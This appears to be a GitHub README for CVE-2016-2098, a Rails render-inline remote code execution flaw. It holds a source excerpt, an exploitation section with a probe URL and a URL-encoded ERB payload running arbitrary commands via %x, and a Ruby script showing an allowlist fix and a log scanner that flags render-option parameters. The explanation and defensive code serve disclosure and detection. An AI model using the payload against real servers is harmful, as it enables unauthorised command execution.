j4k0m/CVE-2016-2098
CVE-2016-2098

Remote code execution vulnerability in Ruby on Rails when render is called on user-supplied data.

Explanation:

This issue comes from calling the render method on user-supplied data.

The render method is usually used to render a page from a template, but it also allows developers to render plain text (plaintext) and even inline code (inline). When the argument passed to render is a Hash, its keys are taken as render options, so a request parameter that Rack parses into a Hash can select those options.

render method (Rails source excerpt):

# File actionpack/lib/abstract_controller/rendering.rb, line 23
def render(*args, &block)
  # A Hash argument becomes the options hash (:inline, :file, :plain, ...);
  # a String names a template. User-controlled data reaches this point unchanged.
  options = _normalize_render(*args, &block)
  rendered_body = render_to_body(options)
  if options[:html]
    _set_html_content_type
  else
    _set_rendered_content_type rendered_format
  end
  _set_vary_header
  self.response_body = rendered_body
end

Exploitation example:

Target URL:

http://example.com/?view=test

Exploitation:

http://example.com/?view[inline]=OK

If 'OK' is shown in the page source, the web application is vulnerable to CVE-2016-2098.

Remote Code Execution

<%= %x('[CMD]') %>

Replace CMD with the command to be executed.

<%= %x('whoami') %>

After URL encoding:

%3C%25=%20%25x(whoami)%20%25%3E

Final:

http://example.com/?view[inline]=%3C%25=%20%25x(whoami)%20%25%3E
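The following Ruby script is an added example written for this page; it is not code from the repository or from Rails. It models the two halves of the issue explained above and in the exploitation section: how a nested query parameter such as view[inline]=... becomes a Hash that render treats as its options, and how an allowlist on the view parameter closes that path. It also scans a few constructed access-log lines for requests that set a render option through a nested parameter, which is the probe pattern the check above describes. The nested-query parser, the simplified normalize_render_args model, the ALLOWED_VIEWS list and the SAMPLE_LOG lines are all assumptions constructed for the example, not Rails or Rack internals.

```ruby
require "cgi"

# Minimal model of how Rack turns "view[inline]=..." into nested params.
# Constructed for this example; Rack's real parser handles deeper nesting.
def parse_nested_query(query)
  params = {}
  query.split("&").each do |pair|
    raw_key, raw_val = pair.split("=", 2)
    key = CGI.unescape(raw_key.to_s)
    val = CGI.unescape(raw_val.to_s)
    if (m = key.match(/\A([^\[]+)\[([^\]]*)\]\z/))
      (params[m[1]] ||= {})[m[2]] = val
    else
      params[key] = val
    end
  end
  params
end

# Simplified model (assumption) of AbstractController's argument handling:
# a Hash is taken as the options hash, a String names a template.
def normalize_render_args(arg)
  case arg
  when Hash   then arg.transform_keys(&:to_sym)
  when String then { action: arg }
  else raise ArgumentError, "unsupported render argument: #{arg.class}"
  end
end

# Vulnerable pattern described in the README: the raw param goes straight to
# render, so "view[inline]=..." arrives as the :inline option.
def vulnerable_render_options(params)
  normalize_render_args(params["view"])
end

# Hardened pattern: only a String from a fixed allowlist may name the view.
ALLOWED_VIEWS = %w[test home about].freeze # constructed allowlist

def safe_render_options(params)
  view = params["view"]
  unless view.is_a?(String) && ALLOWED_VIEWS.include?(view)
    raise ArgumentError, "rejected view parameter: #{view.inspect}"
  end
  { action: view }
end

# Render options an attacker would try to reach through a nested param key.
RENDER_OPTION_KEYS = %w[inline file plain text html partial template layout].freeze

# Returns details of the first query param that sets a render option via a
# nested key (e.g. "view[inline]"), or nil when the query looks benign.
def suspicious_render_param(query)
  parse_nested_query(query).each do |name, value|
    next unless value.is_a?(Hash)
    hit = value.keys.find { |k| RENDER_OPTION_KEYS.include?(k) }
    return { param: name, option: hit, payload: value[hit] } if hit
  end
  nil
end

# Constructed access-log lines for the scanner (not from any real system).
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [01/Jan/2016:10:00:00 +0000] "GET /?view=test HTTP/1.1" 200 512
  10.0.0.9 - - [01/Jan/2016:10:00:01 +0000] "GET /?view[inline]=OK HTTP/1.1" 200 12
  10.0.0.9 - - [01/Jan/2016:10:00:02 +0000] "GET /?view[inline]=%3C%25=%20%25x(whoami)%20%25%3E HTTP/1.1" 200 20
LOG

# Scans log lines and reports each request that sets a render option,
# with the decoded payload so an analyst can see what was attempted.
def scan_log(log)
  log.each_line.map do |line|
    m = line.match(/"GET \S*\?(\S+) HTTP\//)
    next unless m
    hit = suspicious_render_param(m[1])
    hit && hit.merge(line: line.strip)
  end.compact
end

if __FILE__ == $PROGRAM_NAME
  probe = parse_nested_query("view[inline]=OK")
  puts "vulnerable: #{vulnerable_render_options(probe).inspect}"
  begin
    safe_render_options(probe)
  rescue ArgumentError => e
    puts "hardened:   #{e.message}"
  end
  scan_log(SAMPLE_LOG).each { |hit| puts "flagged:    #{hit[:param]}[#{hit[:option]}] => #{hit[:payload]}" }
end
```

Running the script prints the options the vulnerable pattern would hand to render, the rejection from the hardened pattern, and the two flagged log lines with their payloads decoded. In a real application the fix is the allowlist (or a plain, fixed template name); the log scan is a way to find past probing once the fix is deployed.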

Resources: